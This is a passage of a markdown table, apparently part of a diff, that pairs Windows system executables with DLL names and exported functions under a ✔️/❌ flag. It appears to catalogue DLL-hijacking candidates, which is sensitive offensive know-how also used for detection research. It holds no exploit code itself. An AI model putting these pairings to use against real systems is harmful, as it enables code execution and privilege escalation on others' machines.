✔️ | rstrui.exe | SPP.dll | SxTracerGetThreadContextRetail | +| ✔️ | rstrui.exe | SRCORE.dll | DllMain | +| ✔️ | rstrui.exe | SRCORE.dll | SrFreeRestoreStatus | +| ✔️ | rstrui.exe | VSSAPI.DLL | DllMain | +| ✔️ | rstrui.exe | VssTrace.DLL | DllMain | +| ✔️ | rstrui.exe | wer.dll | DllMain | +| ✔️ | sdclt.exe | bcd.dll | DllMain | +| ✔️ | sdclt.exe | Cabinet.dll | DllMain | +| ✔️ | sdclt.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ✔️ | sdclt.exe | CLDAPI.dll | DllMain | +| ✔️ | sdclt.exe | CRYPTBASE.DLL | DllMain | +| ✔️ | sdclt.exe | edputil.dll | DllMain | +| ✔️ | sdclt.exe | edputil.dll | EdpGetIsManaged | +| ✔️ | sdclt.exe | FLTLIB.DLL | DllMain | +| ✔️ | sdclt.exe | PROPSYS.dll | DllMain | +| ✔️ | sdclt.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ✔️ | sdclt.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ✔️ | sdclt.exe | ReAgent.dll | DllMain | +| ✔️ | sdclt.exe | SPP.dll | DllMain | +| ✔️ | sdclt.exe | SPP.dll | SxTracerGetThreadContextRetail | +| ✔️ | sdclt.exe | SspiCli.dll | DllMain | +| ✔️ | sdclt.exe | SspiCli.dll | GetUserNameExW | +| ✔️ | sdclt.exe | UxTheme.dll | DllMain | +| ✔️ | sdclt.exe | VSSAPI.DLL | DllMain | +| ✔️ | sdclt.exe | VssTrace.DLL | DllMain | +| ✔️ | sdclt.exe | wer.dll | DllMain | +| ✔️ | sdclt.exe | WTSAPI32.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | bcd.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | credui.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | DNSAPI.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DllMain | +| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DsRoleGetPrimaryDomainInformation | +| ✔️ | systempropertiesadvanced.exe | LOGONCLI.DLL | DllMain | +| ✔️ | systempropertiesadvanced.exe | netid.dll | CreateNetIDPropertyPage | +| ✔️ | systempropertiesadvanced.exe | netid.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | NETUTILS.DLL | DllMain | +| ✔️ | systempropertiesadvanced.exe | SRVCLI.DLL | DllMain | +| ✔️ | systempropertiesadvanced.exe | WINBRAND.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | WINSTA.dll | DllMain | +| ✔️ | systempropertiesadvanced.exe | WKSCLI.DLL | DllMain | +| ✔️ | systempropertiescomputername.exe | bcd.dll | DllMain | +| ✔️ | systempropertiescomputername.exe | WINSTA.dll | DllMain | +| ✔️ | systempropertiesdataexecutionprevention.exe | bcd.dll | DllMain | +| ✔️ | systempropertiesdataexecutionprevention.exe | WINSTA.dll | DllMain | +| ✔️ | systempropertieshardware.exe | bcd.dll | DllMain | +| ✔️ | systempropertieshardware.exe | WINSTA.dll | DllMain | +| ✔️ | systempropertiesprotection.exe | bcd.dll | DllMain | +| ✔️ | systempropertiesprotection.exe | WINSTA.dll | DllMain | +| ✔️ | systempropertiesremote.exe | bcd.dll | DllMain | +| ✔️ | systempropertiesremote.exe | WINSTA.dll | DllMain | +| ✔️ | systemreset.exe | bcd.dll | BcdCloseObject | +| ✔️ | systemreset.exe | bcd.dll | BcdCloseStore | +| ✔️ | systemreset.exe | bcd.dll | BcdFlushStore | +| ✔️ | systemreset.exe | bcd.dll | BcdGetElementData | +| ✔️ | systemreset.exe | bcd.dll | BcdOpenObject | +| ✔️ | systemreset.exe | bcd.dll | BcdOpenStore | +| ✔️ | systemreset.exe | bcd.dll | DllMain | +| ✔️ | systemreset.exe | Cabinet.dll | DllMain | +| ✔️ | systemreset.exe | d3d10warp.dll | DllMain | +| ✔️ | systemreset.exe | d3d10warp.dll | OpenAdapter10\_2 | +| ✔️ | systemreset.exe | d3d11.dll | D3D11CreateDevice | +| ✔️ | systemreset.exe | d3d11.dll | DllMain | +| ✔️ | systemreset.exe | dbgcore.DLL | DllMain | +| ✔️ | systemreset.exe | DismApi.DLL | DllMain | +| ✔️ | systemreset.exe | dxgi.dll | CreateDXGIFactory1 | +| ✔️ | systemreset.exe | dxgi.dll | DllMain | +| ✔️ | systemreset.exe | FVEAPI.dll | DllMain | +| ✔️ | systemreset.exe | FVEAPI.dll | FveGetStatus | +| ✔️ | systemreset.exe | FVEAPI.dll | FveOpenVolumeW | +| ✔️ | systemreset.exe | ReAgent.dll | DllMain | +| ✔️ | systemreset.exe | ReAgent.dll | WinReGetConfig | +| ✔️ | systemreset.exe | ResetEngine.dll | DllMain | +| ✔️ | systemreset.exe | ResetEngine.dll | ResetCreateSession | +| ✔️ | systemreset.exe | ResetEngine.dll | ResetReleaseSession | +| ✔️ | systemreset.exe | ResetEngine.dll | ResetTraceClientInfo | +| ✔️ | systemreset.exe | ResetEngine.dll | ResetValidateScenario | +| ✔️ | systemreset.exe | tbs.dll | DllMain | +| ✔️ | systemreset.exe | VSSAPI.DLL | DllMain | +| ✔️ | systemreset.exe | VssTrace.DLL | DllMain | +| ✔️ | systemreset.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ✔️ | systemreset.exe | WDSCORE.dll | CurrentIP | +| ✔️ | systemreset.exe | WDSCORE.dll | DllMain | +| ✔️ | systemreset.exe | WDSCORE.dll | WdsInitialize | +| ✔️ | systemreset.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ✔️ | systemreset.exe | WIMGAPI.DLL | DllMain | +| ✔️ | systemreset.exe | WIMGAPI.DLL | WIMCreateFile | +| ✔️ | systemreset.exe | WINHTTP.dll | DllMain | +| ✔️ | systemreset.exe | WOFUTIL.dll | DllMain | +| ✔️ | systemreset.exe | XmlLite.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | AppXDeploymentClient.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | Bcp47Langs.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | DEVRTL.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | DismApi.DLL | DllMain | +| ✔️ | systemsettingsadminflows.exe | DNSAPI.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | FirewallAPI.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | fwbase.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionCreate | +| ✔️ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionDestroy | +| ✔️ | systemsettingsadminflows.exe | logoncli.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | netutils.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | newdev.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | PROPSYS.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | samcli.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | SspiCli.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | StateRepository.Core.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | SystemSettingsThresholdAdminFlowUI.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | timesync.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | USERENV.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | WINBRAND.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | wkscli.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | Wldp.dll | DllMain | +| ✔️ | systemsettingsadminflows.exe | WTSAPI32.dll | DllMain | +| ✔️ | taskmgr.exe | credui.dll | DllMain | +| ✔️ | taskmgr.exe | d3d11.dll | DllMain | +| ✔️ | taskmgr.exe | d3d12.dll | DllMain | +| ✔️ | taskmgr.exe | dxgi.dll | DllMain | +| ✔️ | taskmgr.exe | pdh.dll | DllMain | +| ✔️ | taskmgr.exe | UxTheme.dll | DllMain | +| ✔️ | tcmsetup.exe | TAPI32.dll | DllMain | +| ✔️ | winsat.exe | d3d10\_1.dll | DllMain | +| ✔️ | winsat.exe | d3d10\_1core.dll | DllMain | +| ✔️ | winsat.exe | d3d10.dll | DllMain | +| ✔️ | winsat.exe | d3d10core.dll | DllMain | +| ✔️ | winsat.exe | d3d11.dll | DllMain | +| ✔️ | winsat.exe | dxgi.dll | DllMain | +| ✔️ | winsat.exe | winmm.dll | DllMain | +| ✔️ | wsreset.exe | licensemanagerapi.dll | DllMain | +| ✔️ | wsreset.exe | licensemanagerapi.dll | Reset | +| ✔️ | wsreset.exe | wevtapi.dll | DllMain | +| ✔️ | wusa.exe | dpx.dll | DllMain | +| ✔️ | wusa.exe | WTSAPI32.dll | DllMain | +| ❌ | agentservice.exe | ACTIVEDS.dll | DllMain | +| ❌ | agentservice.exe | adsldpc.dll | DllMain | +| ❌ | agentservice.exe | FLTLIB.DLL | DllMain | +| ❌ | applytrustoffline.exe | mintdh.dll | DllMain | +| ❌ | applytrustoffline.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | applytrustoffline.exe | StateRepository.Core.dll | DllMain | +| ❌ | arp.exe | IPHLPAPI.DLL | DllMain | +| ❌ | arp.exe | snmpapi.dll | DllMain | +| ❌ | at.exe | cryptdll.dll | DllMain | +| ❌ | at.exe | netutils.dll | DllMain | +| ❌ | at.exe | NtlmShared.dll | DllMain | +| ❌ | at.exe | schedcli.dll | DllMain | +| ❌ | at.exe | schedcli.dll | NetScheduleJobEnum | +| ❌ | at.exe | sspicli.dll | DllMain | +| ❌ | at.exe | sspicli.dll | InitSecurityInterfaceW | +| ❌ | auditpol.exe | auditpolcore.dll | AdtEnableSinglePrivilege | +| ❌ | auditpol.exe | auditpolcore.dll | AuditPolicyData\_DeleteAuditDataInstance | +| ❌ | auditpol.exe | auditpolcore.dll | DllMain | +| ❌ | auditpol.exe | auditpolcore.dll | LoadFormatStringAndPrintToConsole | +| ❌ | baaupdate.exe | FVEAPI.dll | DllMain | +| ❌ | bdechangepin.exe | FVEAPI.dll | DllMain | +| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetAuthMethodInformation | +| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetStatus | +| ❌ | bdechangepin.exe | FVEAPI.dll | FveOpenVolumeW | +| ❌ | bdeuisrv.exe | USERENV.dll | DllMain | +| ❌ | bdeuisrv.exe | WTSAPI32.dll | DllMain | +| ❌ | bioiso.exe | iumbase.DLL | DllMain | +| ❌ | bootim.exe | bcd.dll | BcdGetElementData | +| ❌ | bootim.exe | bcd.dll | BcdOpenObject | +| ❌ | bootim.exe | bcd.dll | BcdOpenSystemStore | +| ❌ | bootim.exe | bcd.dll | BcdQueryObject | +| ❌ | bootim.exe | bcd.dll | DllMain | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateBareMetalRecoveryButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateBootableOSButtonCollection | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateCloudRecoveryButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateDefaultOSButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateDeviceListButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateDirectFactoryResetButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateOSListButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateRecoveryToolsListButton | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateSelectOSPage | +| ❌ | bootim.exe | BootMenuUX.DLL | CreateShutdownButton | +| ❌ | bootim.exe | BootMenuUX.DLL | DllMain | +| ❌ | bootim.exe | Cabinet.dll | DllMain | +| ❌ | bootim.exe | dbghelp.dll | DllMain | +| ❌ | bootim.exe | DismApi.DLL | DllMain | +| ❌ | bootim.exe | FLTLIB.DLL | DllMain | +| ❌ | bootim.exe | OLEACC.dll | DllMain | +| ❌ | bootim.exe | OLEACC.dll | GetRoleTextW | +| ❌ | bootim.exe | PROPSYS.dll | DllMain | +| ❌ | bootim.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | bootim.exe | ReAgent.dll | DllMain | +| ❌ | bootim.exe | ReAgent.dll | WinReGetConfig | +| ❌ | bootim.exe | ResetEng.dll | DllMain | +| ❌ | bootim.exe | tbs.dll | DllMain | +| ❌ | bootim.exe | VirtDisk.dll | DllMain | +| ❌ | bootim.exe | VSSAPI.DLL | DllMain | +| ❌ | bootim.exe | VssTrace.DLL | DllMain | +| ❌ | bootim.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | bootim.exe | WDSCORE.dll | CurrentIP | +| ❌ | bootim.exe | WDSCORE.dll | DllMain | +| ❌ | bootim.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | calc.exe | CRYPTBASE.DLL | DllMain | +| ❌ | calc.exe | edputil.dll | DllMain | +| ❌ | calc.exe | edputil.dll | EdpGetIsManaged | +| ❌ | calc.exe | MLANG.dll | ConvertINetUnicodeToMultiByte | +| ❌ | calc.exe | MLANG.dll | DllMain | +| ❌ | calc.exe | PROPSYS.dll | DllMain | +| ❌ | calc.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | calc.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | calc.exe | Secur32.dll | DllMain | +| ❌ | calc.exe | SSPICLI.DLL | DllMain | +| ❌ | calc.exe | SSPICLI.DLL | GetUserNameExW | +| ❌ | calc.exe | WININET.dll | DllMain | +| ❌ | calc.exe | WININET.dll | GetUrlCacheEntryBinaryBlob | +| ❌ | certreq.exe | cscapi.dll | CscNetApiGetInterface | +| ❌ | certreq.exe | cscapi.dll | DllMain | +| ❌ | certreq.exe | DUI70.dll | DllMain | +| ❌ | certreq.exe | DUI70.dll | FlushThemeHandles | +| ❌ | certreq.exe | DUI70.dll | InitProcessPriv | +| ❌ | certreq.exe | DUI70.dll | InitThread | +| ❌ | certreq.exe | dwmapi.dll | DllMain | +| ❌ | certreq.exe | dwmapi.dll | DwmSetWindowAttribute | +| ❌ | certreq.exe | LINKINFO.dll | DllMain | +| ❌ | certreq.exe | LINKINFO.dll | IsValidLinkInfo | +| ❌ | certreq.exe | SSPICLI.DLL | DllMain | +| ❌ | certreq.exe | WindowsCodecs.dll | DllMain | +| ❌ | certreq.exe | WindowsCodecs.dll | WICCreateImagingFactory\_Proxy | +| ❌ | certreq.exe | WININET.dll | DllMain | +| ❌ | certreq.exe | XmlLite.dll | CreateXmlReader | +| ❌ | certreq.exe | XmlLite.dll | CreateXmlReaderInputWithEncodingName | +| ❌ | certreq.exe | XmlLite.dll | DllMain | +| ❌ | certutil.exe | Cabinet.dll | DllMain | +| ❌ | certutil.exe | CRYPTUI.dll | DllMain | +| ❌ | certutil.exe | DSROLE.DLL | DllMain | +| ❌ | certutil.exe | LOGONCLI.DLL | DllMain | +| ❌ | certutil.exe | NETUTILS.DLL | DllMain | +| ❌ | certutil.exe | NTDSAPI.dll | DllMain | +| ❌ | certutil.exe | SAMCLI.DLL | DllMain | +| ❌ | certutil.exe | SSPICLI.DLL | DllMain | +| ❌ | change.exe | logoncli.dll | DllMain | +| ❌ | change.exe | netutils.dll | DllMain | +| ❌ | change.exe | samcli.dll | DllMain | +| ❌ | change.exe | srvcli.dll | DllMain | +| ❌ | change.exe | utildll.dll | DllMain | +| ❌ | change.exe | WINSTA.dll | DllMain | +| ❌ | charmap.exe | GetUName.dll | DllMain | +| ❌ | charmap.exe | MSFTEDIT.DLL | DllMain | +| ❌ | checknetisolation.exe | DNSAPI.dll | DllMain | +| ❌ | checknetisolation.exe | FirewallAPI.dll | DllMain | +| ❌ | checknetisolation.exe | fwbase.dll | DllMain | +| ❌ | checknetisolation.exe | fwbase.dll | FwAlloc | +| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | checknetisolation.exe | fwbase.dll | FwFree | +| ❌ | checknetisolation.exe | fwpuclnt.dll | DllMain | +| ❌ | chglogon.exe | logoncli.dll | DllMain | +| ❌ | chglogon.exe | netutils.dll | DllMain | +| ❌ | chglogon.exe | REGAPI.dll | DllMain | +| ❌ | chglogon.exe | samcli.dll | DllMain | +| ❌ | chglogon.exe | srvcli.dll | DllMain | +| ❌ | chglogon.exe | utildll.dll | DllMain | +| ❌ | chglogon.exe | WINSTA.dll | DllMain | +| ❌ | chgport.exe | logoncli.dll | DllMain | +| ❌ | chgport.exe | netutils.dll | DllMain | +| ❌ | chgport.exe | samcli.dll | DllMain | +| ❌ | chgport.exe | srvcli.dll | DllMain | +| ❌ | chgport.exe | utildll.dll | DllMain | +| ❌ | chgport.exe | WINSTA.dll | DllMain | +| ❌ | chkdsk.exe | DEVOBJ.dll | DllMain | +| ❌ | chkntfs.exe | DEVOBJ.dll | DllMain | +| ❌ | cipher.exe | DSROLE.dll | DllMain | +| ❌ | cipher.exe | EFSUTIL.dll | DllMain | +| ❌ | cipher.exe | FeClient.dll | DllMain | +| ❌ | cipher.exe | iertutil.dll | DllMain | +| ❌ | cipher.exe | NTDSAPI.dll | DllMain | +| ❌ | cipher.exe | VAULTCLI.dll | DllMain | +| ❌ | clipup.exe | CRYPTXML.dll | DllMain | +| ❌ | clipup.exe | webservices.dll | DllMain | +| ❌ | cmdl32.exe | Cabinet.dll | DllMain | +| ❌ | cmdl32.exe | cmpbk32.dll | DllMain | +| ❌ | cmdl32.exe | RASAPI32.dll | DllMain | +| ❌ | cmdl32.exe | rasman.dll | DllMain | +| ❌ | cmdl32.exe | WINHTTP.dll | DllMain | +| ❌ | colorcpl.exe | ColorAdapterClient.dll | DllMain | +| ❌ | colorcpl.exe | colorui.dll | DllMain | +| ❌ | colorcpl.exe | colorui.dll | LaunchColorCpl | +| ❌ | colorcpl.exe | IPHLPAPI.DLL | DllMain | +| ❌ | colorcpl.exe | mscms.dll | ColorCplInitialize | +| ❌ | colorcpl.exe | mscms.dll | ColorCplUninitialize | +| ❌ | colorcpl.exe | mscms.dll | DllMain | +| ❌ | colorcpl.exe | PROPSYS.dll | DllMain | +| ❌ | colorcpl.exe | USERENV.dll | DllMain | +| ❌ | compmgmtlauncher.exe | apphelp.dll | ApphelpCheckShellObject | +| ❌ | compmgmtlauncher.exe | apphelp.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | compmgmtlauncher.exe | CLDAPI.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | compmgmtlauncher.exe | edputil.dll | DllMain | +| ❌ | compmgmtlauncher.exe | edputil.dll | EdpGetIsManaged | +| ❌ | compmgmtlauncher.exe | FLTLIB.DLL | DllMain | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | DllMain | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DllMain | +| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DoMsCtfMonitor | +| ❌ | ctfmon.exe | MSUTB.dll | DllMain | +| ❌ | ctfmon.exe | WINSTA.dll | DllMain | +| ❌ | cttune.exe | DWrite.dll | DllMain | +| ❌ | cttune.exe | DWrite.dll | DWriteCreateFactory | +| ❌ | cttune.exe | OLEACC.dll | DllMain | +| ❌ | cttune.exe | UxTheme.dll | DllMain | +| ❌ | dataexchangehost.exe | d2d1.dll | DllMain | +| ❌ | dataexchangehost.exe | d3d11.dll | DllMain | +| ❌ | dataexchangehost.exe | DWrite.dll | DllMain | +| ❌ | dataexchangehost.exe | dxgi.dll | DllMain | +| ❌ | datausagelivetiletask.exe | dusmapi.dll | DllMain | +| ❌ | datausagelivetiletask.exe | IPHLPAPI.DLL | DllMain | +| ❌ | ddodiag.exe | XmlLite.dll | CreateXmlReader | +| ❌ | ddodiag.exe | XmlLite.dll | DllMain | +| ❌ | deploymentcsphelper.exe | dbgcore.DLL | DllMain | +| ❌ | deploymentcsphelper.exe | DismApi.DLL | DllMain | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | CurrentIP | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | DllMain | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsInitialize | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsTerminate | +| ❌ | devicecensus.exe | dcntel.dll | DllMain | +| ❌ | devicecensus.exe | dcntel.dll | GetCensusRegistryLocation | +| ❌ | devicecensus.exe | dcntel.dll | RunSystemContextCensus | +| ❌ | devicecensus.exe | dcntel.dll | SetCustomTrigger | +| ❌ | devicecensus.exe | dcntel.dll | SetCustomTriggerEx | +| ❌ | devicecensus.exe | IPHLPAPI.DLL | DllMain | +| ❌ | devicecensus.exe | IPHLPAPI.DLL | GetAdaptersInfo | +| ❌ | devicecensus.exe | logoncli.dll | DllMain | +| ❌ | devicecensus.exe | logoncli.dll | DsGetDcNameW | +| ❌ | devicecensus.exe | netutils.dll | DllMain | +| ❌ | devicecensus.exe | netutils.dll | NetApiBufferAllocate | +| ❌ | devicecensus.exe | WINHTTP.dll | DllMain | +| ❌ | devicecredentialdeployment.exe | DeviceCredential.dll | DllMain | +| ❌ | deviceenroller.exe | DEVOBJ.dll | DllMain | +| ❌ | deviceenroller.exe | DMCmnUtils.dll | CopyString | +| ❌ | deviceenroller.exe | DMCmnUtils.dll | DllMain | +| ❌ | deviceenroller.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | deviceenroller.exe | dmenterprisediagnostics.dll | DllMain | +| ❌ | deviceenroller.exe | iri.dll | DllMain | +| ❌ | deviceenroller.exe | netutils.dll | DllMain | +| ❌ | deviceenroller.exe | omadmapi.dll | DllMain | +| ❌ | deviceenroller.exe | omadmapi.dll | FreeCommandLineOptions | +| ❌ | deviceenroller.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | deviceenroller.exe | samcli.dll | DllMain | +| ❌ | deviceenroller.exe | USERENV.dll | DllMain | +| ❌ | deviceenroller.exe | XmlLite.dll | DllMain | +| ❌ | devicepairingwizard.exe | dwmapi.dll | DllMain | +| ❌ | devicepairingwizard.exe | dwmapi.dll | DwmExtendFrameIntoClientArea | +| ❌ | devicepairingwizard.exe | OLEACC.dll | DllMain | +| ❌ | devicepairingwizard.exe | OLEACC.dll | GetRoleTextW | +| ❌ | dfrgui.exe | SXSHARED.dll | DllMain | +| ❌ | dfrgui.exe | SXSHARED.dll | SxTracerGetThreadContextRetail | +| ❌ | dialer.exe | rtutils.dll | DllMain | +| ❌ | dialer.exe | rtutils.dll | TraceRegisterExW | +| ❌ | dialer.exe | rtutils.dll | TraceVprintfExA | +| ❌ | dialer.exe | SspiCli.dll | DllMain | +| ❌ | dialer.exe | SspiCli.dll | GetUserNameExW | +| ❌ | dialer.exe | TAPI32.dll | DllMain | +| ❌ | dialer.exe | TAPI32.dll | lineInitializeExW | +| ❌ | disksnapshot.exe | CRYPTBASE.dll | DllMain | +| ❌ | disksnapshot.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | dispdiag.exe | DEVOBJ.dll | DllMain | +| ❌ | dispdiag.exe | DXVA2.dll | DllMain | +| ❌ | dispdiag.exe | DXVA2.dll | GetNumberOfPhysicalMonitorsFromHMONITOR | +| ❌ | dispdiag.exe | WMICLNT.dll | DllMain | +| ❌ | dispdiag.exe | WMICLNT.dll | WmiDevInstToInstanceNameW | +| ❌ | dispdiag.exe | WMICLNT.dll | WmiOpenBlock | +| ❌ | displayswitch.exe | dwmapi.dll | DllMain | +| ❌ | displayswitch.exe | policymanager.dll | DllMain | +| ❌ | displayswitch.exe | policymanager.dll | PolicyManager\_GetPolicyInt | +| ❌ | displayswitch.exe | UxTheme.dll | DllMain | +| ❌ | displayswitch.exe | WINSTA.dll | DllMain | +| ❌ | djoin.exe | dbgcore.DLL | DllMain | +| ❌ | djoin.exe | JOINUTIL.DLL | DllMain | +| ❌ | djoin.exe | logoncli.dll | DllMain | +| ❌ | djoin.exe | netutils.dll | DllMain | +| ❌ | djoin.exe | netutils.dll | NetApiBufferFree | +| ❌ | djoin.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | djoin.exe | wdscore.dll | CurrentIP | +| ❌ | djoin.exe | wdscore.dll | DllMain | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | djoin.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | djoin.exe | wkscli.dll | DllMain | +| ❌ | dmcertinst.exe | certenroll.dll | DllMain | +| ❌ | dmcertinst.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmcertinst.exe | DSPARSE.dll | DllMain | +| ❌ | dmcertinst.exe | iri.dll | DllMain | +| ❌ | dmcertinst.exe | omadmapi.dll | DllMain | +| ❌ | dmcertinst.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | dmcfghost.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmcfghost.exe | DMPushProxy.dll | DllMain | +| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter\_FreeGetMessageEventName | +| ❌ | dmcfghost.exe | DMPushProxy.dll | PushRouter\_Open | +| ❌ | dmcfghost.exe | dmxmlhelputils.dll | DllMain | +| ❌ | dmcfghost.exe | dsclient.dll | DllMain | +| ❌ | dmcfghost.exe | iri.dll | DllMain | +| ❌ | dmcfghost.exe | omadmapi.dll | DllMain | +| ❌ | dmcfghost.exe | XmlLite.dll | DllMain | +| ❌ | dmclient.exe | WINHTTP.dll | DllMain | +| ❌ | dmclient.exe | XmlLite.dll | DllMain | +| ❌ | dmnotificationbroker.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmomacpmo.exe | DEVOBJ.dll | DllMain | +| ❌ | dmomacpmo.exe | DMCmnUtils.dll | DllMain | +| ❌ | dmomacpmo.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | dmomacpmo.exe | DMProcessXMLFiltered.dll | DllMain | +| ❌ | dmomacpmo.exe | dsclient.dll | DllMain | +| ❌ | dmomacpmo.exe | iri.dll | DllMain | +| ❌ | dmomacpmo.exe | omadmapi.dll | DllMain | +| ❌ | dmomacpmo.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | dmomacpmo.exe | USERENV.dll | DllMain | +| ❌ | dmomacpmo.exe | XmlLite.dll | DllMain | +| ❌ | dnscacheugc.exe | dbgcore.DLL | DllMain | +| ❌ | dnscacheugc.exe | IPHLPAPI.DLL | DllMain | +| ❌ | dnscacheugc.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | dnscacheugc.exe | wdscore.dll | CurrentIP | +| ❌ | dnscacheugc.exe | wdscore.dll | DllMain | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogDestroy | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | dnscacheugc.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | dpapimig.exe | netutils.dll | DllMain | +| ❌ | dpapimig.exe | netutils.dll | NetApiBufferFree | +| ❌ | dpapimig.exe | samcli.dll | DllMain | +| ❌ | dpapimig.exe | samcli.dll | NetUserModalsGet | +| ❌ | dpapimig.exe | SAMLIB.dll | DllMain | +| ❌ | dpapimig.exe | SAMLIB.dll | SamConnect | +| ❌ | dpapimig.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer | +| ❌ | dpapimig.exe | SAMLIB.dll | SamFreeMemory | +| ❌ | dpiscaling.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | dpiscaling.exe | CLDAPI.dll | DllMain | +| ❌ | dpiscaling.exe | CRYPTBASE.DLL | DllMain | +| ❌ | dpiscaling.exe | edputil.dll | DllMain | +| ❌ | dpiscaling.exe | edputil.dll | EdpGetIsManaged | +| ❌ | dpiscaling.exe | FLTLIB.DLL | DllMain | +| ❌ | dpiscaling.exe | PROPSYS.dll | DllMain | +| ❌ | dpiscaling.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | dpiscaling.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | driverquery.exe | netutils.dll | DllMain | +| ❌ | driverquery.exe | srvcli.dll | DllMain | +| ❌ | driverquery.exe | SspiCli.dll | DllMain | +| ❌ | drvinst.exe | DEVOBJ.dll | DllMain | +| ❌ | drvinst.exe | DEVRTL.dll | DllMain | +| ❌ | dsregcmd.exe | dsreg.dll | DllMain | +| ❌ | dsregcmd.exe | logoncli.dll | DllMain | +| ❌ | dsregcmd.exe | netutils.dll | DllMain | +| ❌ | dsregcmd.exe | PROPSYS.dll | DllMain | +| ❌ | dsregcmd.exe | SSPICLI.DLL | DllMain | +| ❌ | dsregcmd.exe | USERENV.dll | DllMain | +| ❌ | dsregcmd.exe | WINHTTP.dll | DllMain | +| ❌ | dsregcmd.exe | WININET.dll | DllMain | +| ❌ | dsregcmd.exe | wkscli.dll | DllMain | +| ❌ | dstokenclean.exe | 